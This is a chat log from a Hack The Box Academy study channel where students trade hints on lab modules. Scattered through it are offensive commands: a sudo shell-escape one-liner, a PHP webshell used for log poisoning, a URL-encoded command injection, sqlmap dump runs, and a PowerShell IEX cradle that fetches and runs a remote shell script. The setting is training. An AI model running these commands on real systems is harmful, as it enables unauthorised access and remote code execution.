#modules
👌🏻 thanks!
@distant stream it's working. I did it on my own windows.
But the proxifier on 172.16.5.19? Nothing listens on 1080 on 172.16.5.19. The Listener is on the first host. I think I didn't understand something. I run proxifier on the first host and created a rule to forward to 172.16.6.155. The sock test seems to work.
Yes, I understand it also and my test with the rule works. So the Text on the Site is wrong 😉 "After starting our listener, we can transfer Proxifier portable to 172.16.5.19, and configure it to forward all our packets to 127.0.0.1:1080. Proxifier will route traffic through the given host and port. See the clip below for a quick walkthrough of configuring Proxifier" Thanks for the Crosscheck 🙂 🙂 🙂
d
Trying to do this:
RDP to XXX with user "htb-student" and password "Academy_student_AD!"
for this: https://academy.hackthebox.com/module/143/section/1420
But it says wrong username and password. Any ideas?
thank you!
I'm no expert, I just know enough to modify a script xD. I can definitely feel where you are coming from
Hey, you mind dming about this? still having trouble
@edgy flame try using secretsdump.py and authenticate as the adunn user 🙂
Just curious: do people prefer using your own virtual machine or the Parrot for following modules?
Anyone know/done shells and payloads module? Stuck on a question pertaining to the payloads section of the module
Got it thanks!
Thank you I finally fatigued it out with some help. Basically I had to pay attention to what Intruder's responses were explicitly saying, and then infer by what the responses were not explicitly saying. E.g. when Intruder says "Only images are allowed" it doesn't necessarily say that the extension was bad.
Hi seeing if any ones done the Windows Privilege Escalation module may be able to give me some insight. Stuck on the section titled "Credential Hunting"
question "Search the file system for a file containing a password. Submit the password as your answer." Hint: :"Start at C:\Users"
Did indeed find a txt file at c:\Users\htb-student\Documents containing a password but when I enter it HTB is saying it's incorrect. Am I missing something or is this an error in the module?
@lament crag try checking the root directory. ls /
format for the command is xfreerdp /v:<Target IP> /u:htb-student then it will prompt for password. I recommend copying and pasting the password given.
Can someone help me with the broken authentication module on the section that I need to craft a reset token for htbadmin? I’m not that good at python so I can’t make the script to work and I’m stuck
dm
Hi
In Broken Authentication , I don't know why I can't find the encoding method
can anyone give a nudge
I could use some help with the final Skills Assessment for the File Upload Attacks module please.
I've uncovered the source code of the ||upload.php|| file and found the name of the uploads directory, but I'm not quite sure how exactly ||my files are being renamed when uploaded.||
And although I have a list of file extensions that might work because the response from the Burp Intruder's extension fuzzing is "Only images are allowed"...which implies the extension is actually fine, I still can't get a "successful upload" response from anything I try.
Can i DM?@feral gyro
yep
Can someone help me get started with Server-Side-Attacks skill assessment, I'm not sure which footprinting activities they mean here, if someone can at least DM me the method to use, I've tried everything taught on the module, but nothing even slightly matches the assessment website
Has anyone finished the Windows privilege Escalation skill assessment? I need to find the creds for "ldapadmin" but I'm stuck. Can anyone provide a hint? thx
hi everyone, can you help me please? i'm stuck answer meterpreter section, metasploit module, any suggestion for me?
Have you checked the webpage source code? Some external libraries might not be who they claim to be
question: "Find the existing exploit in MSF and use it to get a shell on the target. What is the username of the user you obtained a shell with?"
are u finished "using the metasploit framework" module bro?
hi mate, are u have any suggestion for me please?
Did you already establish a shell?
nope, i have not found any exploit to get shell
i was trying different exploits but no session was created
target machine opened port 445 smb, 5000 upnp
i was trying eternalblue, eternalromance exploit but target is not vulnerable
Can you elaborate, there's only these two and they seem to be what they suggest to be: <li><a href="/auth/register">Register</a>
<li><a href="/auth/login">Log In</a>
Maybe some javascript library?
so any hint bro?
I think I found what you mean, but not sure how to use it
No haven't taken that module yet 😛
anyone doing the pivoting module?
Check DM
Hey guys doing the machine in Getting started module in the last section, can someone take a look at my notes and tell me what I can do to be better/ improve methodology?
It's my first time approaching a machine alone so would appreciate anything
the notes?
i was thinking it was more appropriate to do in dms
feel free to send in mine
Doing the same module, which part you're stuck in
Got it thanks! This was insanely tricky IMO
Can I DM someone regarding the Attacking Common Services Module (Attacking SMB section)???
Hi, I've just reached the end of Command Injection course (Skills Assessment), I can't figure out where to inject the payload.
I've tried caching requests with burp but no matter what function I use on the site, no useful requests are cached.
Then I tried injecting into the URL but similarly without any luck. I've tried all the Injection Operators in the cheat sheet.
Seems like I'm stuck at level 0 here, please help!
hello, i am doing Local File Inclusion Skills assessment and i have managed to find the lfi and tried to poison on /proc/self/environ/ with the user agent <?=phpinfo(); ?> and when i checked my log file i can see that phpinfo() is working but system($_GET['cmd']) is not working can anyone correct me?
Haven't done this module, but have you tried the alternatives to system() function?
I finished it, is there a question?
Yes I do. Mind if I pm you?
Dm
How about system($_REQUEST['cmd'])
Is it on purpose that PIVOT-SRV01 is not domain joined computer, in module Pivoting Tunneling and Port forwarding skills Assessment?
Because, the adws is installed it is just disabled and actually I did not find any more hosts with ping sweep either.
@sweet heron Can I DM you regarding this one???
also the two interfaces on the PIVOT-SRV01 host has overlapping netmasks
Not working
Hi everyone, I am on the Web Enumeration section of the Getting Started Module and when trying to run gobuster on the target nothing happens. I also have tried pinging the target just to see if I can get any response but nothing? can someone please assist?
Am i doing something wrong?
You have to specify the port too
Gobuster assumes the default port for web services which is 80 but not default in our case
Make the URL like http://IP:port/
So in this scenario the port would be 32228? I tried your advice it with a new target and got the same results. Also, thank you for reading and assisting
Yes
same deal. Would you mind if I DM you?
Sure no problem
I'm in Linux fundamentals module and I downloaded the vpn key and ran it through sudo openvpn academy.ovpn. I then receive an initialisation Sequence complete but when I try to connect to ssh port nothing happens. No commands are working. After some time it shows Inactivity time out.
anyone able to give me a nudge on AD Enumeration & Attacks - Skills Assessment Part I?
I need help with "Submit the contents of the flag.txt file on the Administrator desktop on MS01"
I need assistance on command injection skills assessment. I haven't sent a malicious request but still get an error for one
I have a virus on my pc that duplicate files how do i get rid of it without losing my things
How do I configure and run nginx reverse proxy and ajp? I can't bind to port 80 because it's already in use.
Hi. I am stuck on Getting Start Module privilege escalation part of knowledge check. I used LinEnum.sh and found a vector to raise privilege using “sudo -l” command, but I could not go further. Is there any suggestion?
hola
run the command ls -la /usr/bin see them execute with root permission usually only python3 on linux go to https://gtfobins.github.io/ to load a payload to get privilege
gtfo bins
if there's something from sudo -l, gtfo bins is a free win
Thanks. I will do that.
Thanks. I will do that.
hey guys im in the last section of getting started module, i got the first flag but now i need to get privilege esc to root user. I found that i can use /bin/php without any password so I went on GTFObins to find a command that i can escalate sudo with. I found it but when i paste it into the meterpreter shell it does nothing. any idea? I upgraded the shell to tty
Hello!
I am currently stuck on the Skills Assessment of SQLMAP Essentials.
I have already found the issue with the user-agent. Unfortunately I can’t get any further.
Thanks for any help.
use this instead sudo php -r "system('/bin/sh');"
or first export CMD="/bin/sh" then sudo php -r "system('$CMD');"
holy shit bro thanks
but what was i doing wrong?
they both were different commands
the first one sets an environmental variable named CMD whose value is /bin/sh
tho you need to use export before that command to actually set it which gtfobins have specified
oh so instead of declaring the variable first you just put in the command straight away
wait but I thought i did it like that
.
its like export variable_name=value
where on gtfobins is that specified?
nowhere
I cannot find the answer of the questions "What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)" in ACTIVE DIRECTORY ENUMERATION & ATTACKS. Could someone help me please on this?
it becomes common knowledge once you know about using env. variables and paths
okay so just as a rule of thumb from now on, I need to export the environmental variables before i try to declare them?
like this right? sudo php -r "system('/bin/sh');"
can someone give me a nudge on File Upload Attacks Blacklist Filters?
Hello!
I am currently stuck on the Skills Assessment of SQLMAP Essentials.
I have already found the issue with the user-agent. Unfortunately I can’t get any further.
Thanks for any help.
Dm
@silent knoll try adding an item to your cart and intercept with burp. There is some json in the body of the post request , and this is the injection point. From there you can fine tune your command until you get the flag.
Can anyone here please assist me with the Skills Assessment for the File Uploads Attack module? Feel free to DM. Thank you.
Anyone mind helping me understand the port forwarding going on in a particular HTB walkthrough?
hi i can help you. what's up
Hi people! I'm stuck again in the ZAP scanner section, anyone willing to give me a hand it seems the Scanner finds a Command injection vulnerability and I need to exploit it to read flag.txt
The thing is i don't really know how to exploit the vulnerability with the url it provides
@uncut raptor so in this screenshot , it is running the command: cat /etc/passwd . But it's all URL encoded. So try replacing it with a URL encoded cat /flag.txt
struggling with this just a minute now haha
this is mine which is not working: https://188.166.172.138:32461/ping.php?ip=127.0.0.1%26cat+%2Fflag.txt
although i'm crafting this blindly cause my instance got shut down and i haven't ran the active scan again
needs to be http and not https. Also your URL is slightly wrong
needs to be /devtools/ping.php
I need some help with the last question of the Information Gathering - Web - Skills Assessment of the Information Gathering - Web Edition module
I believe I have the right answer, but it doesn't seem to be working
i got it jared, thanks a lot you're a charm !
I found a subdomain with the keyword in it, but that doesn't seem to work for the answer
Anybody here having issues connecting to the "Web Service & API Attacks" - "Arbitrary File Upload" site? Port 3001?
Hi all, for the metasploit module - sessions&jobs (MSF sessions) could someone please DM or hint the relevant exploit for the root access? I tried ||sudo_baron_samedit|| but had trouble loading it. Thank you
thanks so much! --fresh-queries did the trick 🙂
@iron tartan if you're still having problems feel free to DM me 🙂
Thanks but I figured it out
The formatting of my scripts had been a bit off so there were a couple extra characters in the subdomain name that I needed to remove
@sweet heron Can I DM you??
In the Broken Authentication module, first assignment. Which tools am I supposed to use to bruteforce the login, there's no mention of this
"When we try to find default or weak credentials, we prefer using automated tools like ffuf, wfuzz, or custom Python scripts, but we could also do the same by hand or using a proxy such as Burp/ZAP. We encourage you to test all methods to become familiar with both automated tools and scripting."
There is also a custom python script that performs a bruteforce attack
I think in "PIVOTING, TUNNELING, AND PORT FORWARDING " - "Meterpreter Tunneling & Port Forwarding" there is a problem with the second question: "Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x.x)". The format is wrong and the seemingly valid answer is not accepted. Could the module authors take a look into this? Thanks.
@mild mango Can I DM you regarding the Attacking Common Services Module, Attacking SQL Section?
Anyone available who can help with AD Enumeration & Attacks - Skills assessment part 1?
I'm trying to get the credentials for the very first task in Broken Authentication, I'm running with: wfuzz -z file,/opt/useful/SecLists/Usernames/cirt-default-usernames.txt -z file,/opt/useful/SecLists/Passwords/cirt-default-passwords.txt 159.65.58.189:32686 -d "username=FUZZ&password=FUZ2Z" | All I keep getting is the same error, UserWarning:Fatal exception: Too many arguments.
What's the issue here
Also how am I supposed to know the login part of the website, when it gives me nothing when I try to login
Dm
Like, how can I figure this part out, if nothing comes up as I try to login:
dm me, might nudge you in the right direction
What's the dm?
sent you dm 👍
Answering myself: just try any possible output from every possible alternative.
Pivoting course was so awesome 😍
Dm me
hello, having trouble with sqlmap essentials module
[13:26:04] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
what does this mean?
Has anyone completed the Broken Authentication, first task? I'm getting nowhere here, cant find a simple username, or know what's the name of the 'login' page:
How can I wfuzz this if there is no login page
Hi Team!
I am working through Public Exploits on getting started. Am I doing something wrong here to start?
i would do a simple -sC -sV scan
0 host up
do you mind if I DM you? I am little lost
no problem
Fuzz for a login page first then
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
need help for sqlmap / --columns i dont understand
what's the Proceed Data about ?! helps are appreciated
https://academy.hackthebox.com/storage/modules/112/enum-method3.png
@ebon pine try navigating to the target:port in your browser 🙂
Hey guys need a hint on Skills Assessment - Using Web Proxies
@frigid vector which question?
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
DM me 🙂
@rustic sage can I Dm you on a question about MSF?
Can i get some help on ACTIVE DIRECTORY ENUMERATION & ATTACKS on question on ACL
What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)
I tried to reset the target multiple times, but every time the same issue with RDP:
[20:01:52:567] [495568:495569] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 0
[20:01:52:567] [495568:495569] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
[20:01:52:768] [495568:495569] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D] from server
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core.nla] - SPNEGO failed with NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D]
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_AUTHENTICATION_FAILED [0x00020009]
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[20:01:52:768] [495568:495569] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
on rdesktop the username and password is not working
This is really totally strange. Did someone have a solution for this issue?
Thank you!
hey i got a question
Using auxiliary/scanner/smb/smb_ms17_010 as check
An SMB Login Error occurred while connecting to the IPC$ tree.
Scanned 1 of 1 hosts (100% complete)
Cannot reliably check exploitability.
whats wrong with it?
So, what's the question?
i have to use metasploit to follow up with the Document and get the flag
but im having issues with metasploit
like that one
Can you screenshot me the question?
in dm?
Here
i cant send ss here
Then paste the question
when i run the "check" command on metasploit i get the "An SMB Login Error occurred while connecting to the IPC$ tree." error
when i run it i get Rex::Proto::SMB::Exceptions::LoginError: Login Failed: execution expired
1. An SMB Login Error occurred while connecting to the IPC$ tree. 2. Rex::Proto::SMB::Exceptions::LoginError: Login Failed: execution expired
these are the 2 errors im getting
Hey can someone give me some hint on Broken Authentication Skills Assessment?
use remmina work perfect for me
I can’t make sense of the cookie (if there’s any) and bruteforcing passwords of the enumerated users doesn’t seem to work
Does not work for me 😦
PASSWORD ATTACKS / Credential Hunting in Linux
Examine the target and find out the password of the user Will. Then, submit the password as the answer.
...
I dont understand the hint: "From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". We have already provided a prepared list of passwords in the "Resources" section for simplicity's purpose."
There a ssh service? I Scanned the ip and dont give some important service related with the module as smb, ssh, rdp, etc
In AD Enumeration & Attacks - Skills Assessment Part I the questions of the users cleartext password. Could someone give me a hint where I can find the user password?
EDIT: Nevermind I see where I messed up now. Got the flag.
Looking for help on the "SSRF Exploitation Example" module. please.
I'm trying to use the bash script provided in the lesson, but I keep getting the error: bash: syntax error near unexpected token `>'
whenever I copy/paste the script into my terminal. Anyone know how I can fix this script to avoid the error?
System501@htb[/htb]$ function rce() {
function> while true; do
function while> echo -n "# "; read cmd
function while> ecmd=$(echo -n $cmd | jq -sRr @uri | jq -sRr @uri | jq -sRr @uri)
function while> curl -s -o - "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=${ecmd}"
function while> echo ""
function while> done
function> }
Hi folks! i'm stuck at Skills Assessment - Using Web Proxies
where i have to fuzz the md5 cookie. In case anyone remembers this, it's a 31 char md5 hashed cookie where the exercise suggests hashing the last character and then encode with processing.
I'm running my attack with all this processing and getting all the same responses with 200 OK, i don't see a flag anywhere *edit @west canopy you remember this?
Hey fellow hackers, justa n00b with a quick question regarding linux. Im doing the cracking passwords with hashcat / Cracking wireless (WPA/WPA2) handshakes with hashcat module, My kali is running in a VM (UTM) aarch64 Mac M1 and I'm getting this error
@woeful oxide you need to be in the same directory as the cap2hccapx.bin file
got it! thanks
yes , you are trying to run a binary that is not located in your current working directory
@here Hey everyone i am stuck at intro to bash
for loop question and i am getting this error any help on this? it maybe that i am using a diff version of openssl in the pwnbox how can i fix it?
this is my script
i didnt change anything on the original file just added these lines
srry, wrong ss, this is the one
& this one
@west canopy
Yes I am getting the same results as you 😦 Maybe try it on the pwnbox?
Where is the file shell.ps1 suppose to be uploaded? I can't find it after a successful GET code. 200. Is it supposed to execute itself automatically.
shell.ps1 is hosted locally on your attack machine while running an http server. Druva.ps1 is uploaded to the target and ran from powershell
Yes and then $cmd of druva.ps1 uploads the shell.ps1 via IEX or is it suppose to automatially execute it? (this command: $cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.4:8080/shell.ps1')")
Because the file is well uploaded from my http server, but nothing happens after.
anyone could help me here i run ffuf but found nothing interesting
hey i have a question guys does anyone have the issue where they openvpn but cant ping the module?
i was trying to make sure i was connected to the academy vpn
because when i was trying to run gobuster it was gettting errors
i will try again right now because i see sequence complete
get this which i know im connected to the vpn
but when i attempt to ping the module i get an error
packet loss
web enumeration
@devout vector typically Docker targets aren't pingable
@lament crag try checking the root directory. ls /
I know I definitely got the flag for "Find the flag by using a webshell." but it says it's wrong. Is this an error?
I get access with the suggested username in the hint, but now i need get credentials from other user, all i have is an zip that im trying cracking and login.json firefox, but i can't crack the zip, and can't decrypt the login.json with firefox_decrypt.py, and i can't make remote connections to internet for download lazagne or other tool, any idea?
Solved!
Hi Again, Still looking for some help with AD Enumerations and attacks skills assessment. If anyone is available any help would be much appreciated
🙏
stuck on sqlmap module case 7
what am i doing wrong
sqlmap -u 'http://157.245.33.77:30000/case7.php?id=1' --threads=10 --risk=3 --level=5 --technique=U
what the hell i'm supposed to do with this hint
- "Try to count the number of columns in the page output, and specify them for sqlmap."
Hello guys
hello
specify the columns
sqlmap --columns X
Yes, just specify the number of columns like id, name, etc.
You are on the right track
it doesn't take a value like =5
i try with --columns id,name,birthday.... now we'll see
No, you must specify a value
dm if you still need help
trying this rn
sqlmap --columns 5 -u 'http://157.245.33.77:30196/case7.php?id=1' --level=5 --risk=3 --threads=10
try with --union-cols
I just add --union-cols? to the current command or i replace the --columns 5
replace
ok thanks
the command run for a life
i will let it run while i eat we'll see
sqlmap -u 'http://157.245.33.77:30196/case7.php?id=1' --level=5 --risk=3 --threads=10 --union-cols=5 --batch
Has anyone finished the Attacking Common Services module and can give me a hint on the last question on Attacking Common Services - Hard?
DM
it didn't work
Yo guys
Is the target server a shared instance? I saw the exploits were already available there
And compiled too
you might try adding --dbs --dump and maybe --crawl=2
I know I definitely got the flag for "Find the flag by using a webshell." but it says it's wrong. Is this an error?
generally no.
what module is that
Alright
@lethal atlas SQL injection writing files
DM me
Is it Academy stuff? You can DM if you want. (:
sqlmap -u 'http://159.65.58.189:30795/case7.php?id=1' --level=5 --risk=3 --union-cols=5 --dbs --crawl=2 --threads=10 --batch --dump
got the flag with
sqlmap -u 'http://159.65.58.189:30795/case7.php?id=1' --level=5 --risk=3 --dbs --crawl=2 --threads=10 --batch --dump
getting rid of the --union-cols got me the flag wtf
hello everyone
anyone who has completed "Using Web Proxies" Module, to help me to understand what we have to do in the Question under "ZAP Fuzzer" section
cause I really not understanding what exactly have to do...!!!
Hi Team!
I have been working on the Public Exploits section of Getting Started and I am having a hard time understanding what I am doing incorrect
The hint is telling me to find a plugin vulnerability, the google maps one is the only one that seems to align with the hints from putting the IP:Port in the browser, it showed up on the search and msfconsole. I set the RHOST to the target and RPORT to the port given to me by HTB. I assume the TArgetURI is the path provided by MSFConsole. Any help would be greatly appreciated!
Targeturi is essentially the url of the website &/or web app hosted on the target. @ebon pine
Hi guys ! I have a question : in the archetype challenge of the starting point, we are using an extended procedure of Microsoft SQL Server called xp-cmdshell to be able to run a command line on the machine. But after that, we are trying to set up a 'reverse shell' with NC. I don't understand that. We already have access to the command line / power shell. Why are we trying to set up something else ?
There's a few reasons you may want to upgrade to a reverse shell from xpcmdshell. One, getting a reverse shell will allow for more interactive access on the underlying host. You'll be able to move to different directories, upload & execute files and even elevate privileges easier. Then if it was a multi-host network having a fully interactive shell would allow you to try to pivot to another host. You're pretty limited on what you can do through xpcmdshell compared to a fully interactive shell.
I see. I thought that from the moment we could execute system commands we could already do everything. But I guess having a dedicated reverse shell is more convenient
Absolutely. It also depends on what privileges you have when executing commands through xpcmdshell. In some cases you may use the access you have through the database to just further your access in a challenge lab network or on a real life engagement for an organization.
i'm working on the nibbles module following the academy guide and i'm stuck if anyone can help me out with a netcat issue
Nevermind got it. You have to add the script to the original thing not replace it
Ok the code is showing up but isn't triggering my netcat listener...
To be able to use a reverse shell, we use netcat and bind it to a command line program with the -e option. Why can't I see this option in nc -h ?
the help menu offers basic flags and parameters which are used
you can consult the man page for all the flags
alright, thanks !
I'm working on the hacking wordpress module and getting stuck on the directory indexing. I'm not sure if it is me or something is wrong with the target system. Using the cheat sheet and everything provided in the lab up to this point, I can't get anything for the question referring to manually enumerating the target for any directories whose contents can be listed. The wpscan keeps failing, saying that the system seems to be down. I know this is taking way longer than it should. Can somebody please give me a hint?
haven't done the module but did you try running gobuster or something like that?
it will give you list of directories available on target
then you can manually check which directories content are listed when accessed
I want to download winPEASx64.exe as required but all of my browsers refuse telling me that it is a dangerous file.
Is there any way to bypass the browser protection ?
The module describes how you can list the content. Start in exactly this path and continue searching from there
Use the shell
thank you very much!
having some issues with active directory in academy, details in #613049811481919508, any and all help would be awesome
Still struggling on Broken Authentication Skills Assessment. I enumerated users, grepped the rock you according to the password policy and tried to brute force the usernames found with no success. Also I haven’t gotten anything out of the cookie. Any help?
Oh just found out how the cookie is formed
Hi
Heyyy hru ?
anyone can give me road map 2022 for cyber security ?
sry for bad english
What happened to the pillaging module??
Still struggling on Broken Authentication Skills Assessment. I enumerated users, grepped the rock you according to the password policy and tried to brute force passwords of the usernames found with no success. I found out how the cookie is formed and tried to use it in multiple ways to try bypass authentication but nothing worked. Any help?
Thank you, I had to take a break and look at fresh and see how simple it really was. My head was getting in the way again.
I finally became a ghost
I'm stuck on the Server Side Attacks Module: Nginx Reverse Proxy & AJP. Can someone give me a hand with this one?
When trying to setup the proxy/nginx on the Pwnbox, I keep getting the error nginx: [emerg] "location" directive is not allowed here in /etc/nginx/conf/nginx.conf:65 I assume I'm setting up the nginx.conf file incorrectly.
Just need to get the Tomcat version of the Target. Answer format: X.X.XX
@ebon pine I don't think that exploit will work. Try navigating to the ip:port in your browser , this should reveal the WP Plugin being used.
@knotty falcon DM me 🙂
@sage jackal have you been able to get logged in as the support.xx user?
No and I’ve only found just the normal support user. Are there more ?
Yes, the support user's username is in the format of support.xx , where xx is a country code. Once you find a valid support.xx username, you can filter rockyou.txt for words meeting the complexity requirement and use that to log in.
I found it and logged in, trying to figure out what to do next
Hey Jared! Sorry for getting back so late! I ended up getting it figured out and you are correct. Working on privilege escalation now. What a helpful community though!
@sage jackal try tampering the cookie to switch to an admin user 🙂
Hello, I'm stuck in this challenge, I extracted the root hash and tried with rockyou list 2 times and can't get the password, some idea?
PASSWORD ATTACKS / Passwd, Shadow & Opasswd
Examine the target using the credentials from the user Will and find out the password of the root. Then, submit the password as the answer.
Figured it out, thanks! Done 🙂
do any of u have hacks for bullet force?
Im Stuck at "Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag?"
I tried all super users i knew like root, admin...
can someone give me a hint which wordlist i should use
Did anyone have issues cracking the mscacheV2 hash for the AD enumeration and attack module skills assessment?
I ended up giving up and going to bed. I’ve got the reverse shell but went to bed trying to escalate privilege
Found a script but couldn’t get it to execute in the .php file I uploaded
Home, nap then figure it out 😂
I think I know what the problem was but was too tired to continue. Will do! Appreciate it.
Am I doing it wrong, but that's a valid query and LDAPwiki suggests the same :/
Full query -
Get-ADObject -LDAPFilter '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))' | select samaccountname,useraccountcontrol
Module Shells & Payloads, section windows infiltration.
Question : Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:\
Could someone help me on this one?
Thx in advance for your time
hi fellows, quick question, do we have mobile hacking modules?
or any place you can advice I start studying from?
Module File Transfers, section Windows File Transfer Methods .
Question : Another way to upload the uploud_win.zip file
Hi guys, I'm curious to find another way to upload this file, I succeeded only
with copy and paste in my Windows machine, I tried with curl, Web-Request,
Bitsadmin but I didn't succeed (it always gives me the 403 response - read-only server).
Is there another way to upload this file?
Thanks 🙂
Anyone did hard skill assessment on Password Attacks? I'm losing my mind
@thin barn did you solve "Passwd, Shadow & Opasswd" yet? I am stuck getting the password of the root user after running unshadow on the passwd and shadow files with the user Will, I tried 2 times with the rockyou wordlist and could not find the password, is it on the rockyou list?
Hello, has anyone done the Web Requests module specifically the Get section. I've been banging my head against the desk all afternoon trying to solve this....
Hi, Dm if need help
Dm
Can someone provide me with a nudge? I am doing the Cookie Bruteforce section, question 1 of the Broken authentication module. Not sure which wordlist I can use to bruteforce the position of the user role to that of a super user...
Not the best place to post this.... Go to another discord for this.
Metasploit module: Session and jobs section
"The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer."
I was able to get a shell, but I did not have root. I can't find the relevant exploit to run on the target system. (I have been using exploits for the elfinder service)
Help would be appreciated.
I'm stuck in the OSINT module What is the hosting provider for the inlanefreight.com domain? I used whois and shodan, both give me DigitalOcean but it doesn't work, can anyone help plz?
if anyone is available to help with the web attacks module i would appreciate it. stuck trying to understand this javascript
window.location = `/download.php?contract=${encodeURIComponent(btoa(uid))}`;
specifically the encoding part
the module example they talk about uses md5 instead of the encodeURIComponent
but the contract filename is definitely md5 encoded from what i can see
nevermind, was reading the wrong part of the code i guess
I downloaded linpeas with the shell (user privileges) to find the vulnerability of sudo.
did they ever answer?
The question is not clearly stated. You need the role super.
Look in the developer tools for the URL. Then send a request via cURL to the found URL with the search term flag.
Also have a look at the hint. You have to authenticate yourself.
Hey, its all good I got it in the end with some help from someone. Thank you though 🙂
Hello, I am doing the course Bug Bounties, I am in the module Using Web Proxies and solved all the questions for the skills assessment.
But there is one question I tried to solve and did not succeed, if anyone can help me with the solution.
The question is Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)?????
Guys, I'm having problems with Skill Assessment - Broken Authentication. I found out about Username ||support||, but I don't know what to do next. I tried with Rockyou.txt wordlist filtered on ||first capital Letter, at Least One LowerCase, Final Digit, and at Least 20 Characters||, but none managed to make match with Username ||support||, even working with the timeout problem, and inserting manually. I also tried to see about this ||country code|| that people are talking about on the ||Support|| tab, but I couldn't take any information about it. Could anyone give me any hint about this part?
@random cape so for the support user, it's actually in the format of support.xx , where xx is a country code. Once we find a valid username for the support user (there are more than one), we can filter the rockyou.txt wordlist for words matching the password complexity requirement.
@halcyon owl DM me 🙂
@foggy furnace DM me if you still need help on Shells & Payloads !
whats up @west canopy
@lethal atlas whats up brother !
Working my life away lol
They make you work Sundays?
My wife does.
@raven cairn Have you tried using the local exploit suggester?
@lethal atlas does she pay well?
@limpid wharf DM me if you still need help with OSINT 🙂
@west canopy she lets me sleep with her so I guess thats good enough.
Hey!, I'm stuck on the Server-Side Attacks, Nginx Reverse Proxy & AJP.
Each time I try to set up the environment I get this message:
nginx: [emerg] "location" directive is not allowed here in /etc/nginx/conf/nginx.conf:65
I assume I'm setting up the nginx.conf file incorrectly
@spice olive DM me 🙂
Got this resolved
Hello. I'm having issues again. Metasploit framework module: meterpreter section.
I have been trying a multitude of metasploit modules, but none have worked.
An nmap scan shows that Fortilogger can be accessed on the browser. Am I supposed to attack this?
@raven cairn yes, try the fortilogger arbitrary file upload exploit
I have been doing that... I wonder what I am doing wrong ...
Lol. I got the shell. Confused what I did wrong.
Probably just screwed up some options
windows privilege escalation skill assessment part 1. At the beginning having trouble exploiting the command injection vulnerability to get reverse shell. Windows CMD netcat one liners dont seem to be working for me. Any tips or clues?
Doing vulnerability assessment, nessus skill assessment. Anyone know where the data is from the scan that was already ran?
@wheat garden i was able to do it by starting an impacket-smbserver which hosted a netcat executable , then used that to get a reverse shell
@livid pier it should be My Scans --> Windows_basic_authed
My savior!
OKay thank you for the pointer I will try that.
You find it in the linux box or the windows box?
Not sure what you mean
i think if you just go to port 8834 it will bring up the Nessus Dashboard
Is there a current issue with the website where the Unlock button isn't working on modules?
nothing coming through on the web console or network when i click it
Also tried in private window with no addons and same effect. All that changes is the padding on the webpage when i click it
@tiny ember maybe try a different browser if you haven't already?
yeah i tried firefox as well, in private window. (currently using Brave)
interestingly, when i hit the Continue button here, i get this error at the top for "This module is coming soon" and i'm wondering if the "The Penetration Testing Process" module at the top is overriding all the other unlocks or something
tried on other pages as well and still no dice :(. Is there a different forum to go through for this. Or am I assuming that no one else is experiencing this?
gunna try a whole nother computer 🙂
okay weird, doesn't work on my Mac either
@west canopy took me years but i found it, thank you
Could I get some help with the Hacking Wordpress: Directory Indexing module please?
I assume the flag is buried somewhere in the ||wp-includes|| directory (?) and I've tried various curl and grep commands but no luck. Or is there a way we issue the tree command somehow to the remote web page?
Anyone on who can help with AD attacked skills assessment part II. I'm stuck on the "Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain."
@knotty falcon try looking in /wp-content/plugins/mail-masta
@manic ermine try using DomainPasswordSpray.ps1 and reproducing the steps shown in the "password spraying from windows" section
The content of the flag.txt is getting incorrect how?
Module: shells and payloads
Section: Infiltrating windows
Successfully exploited the target system,
Goddamn
There was the $ at the end and it appeared to be part of shell prompt
Evil
Thanks Jared...has anyone had issues with importing "domainpasswordspray.ps1"? I'm getting:
At C:\Users\AB920\Desktop\DomainPasswordSpray.ps1:261 char:21
+ Write-Host "$Message: Waiting for $($Seconds/60) minutes. $($ ...
+ ~~~~~~~~~
Variable reference is not valid. ':' was not followed by a valid variable name character. Consider using ${} to
delimit the name.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : InvalidVariableReferenceWithDrive
Thanks for the help @west canopy , I realized what I was doing wrong and finally got the flag :D, but I'm curious, how did you come to the conclusion that the username format was "support.xx"? I found nothing that led me to this information about this username format, with a point between support and the country code
@manic ermine Yes I had to change a line of the script to make it work, specifically line 261
@random cape they give a vague clue on one of the pages at the top, after you first sign up and log in to the website. I forget which page though.
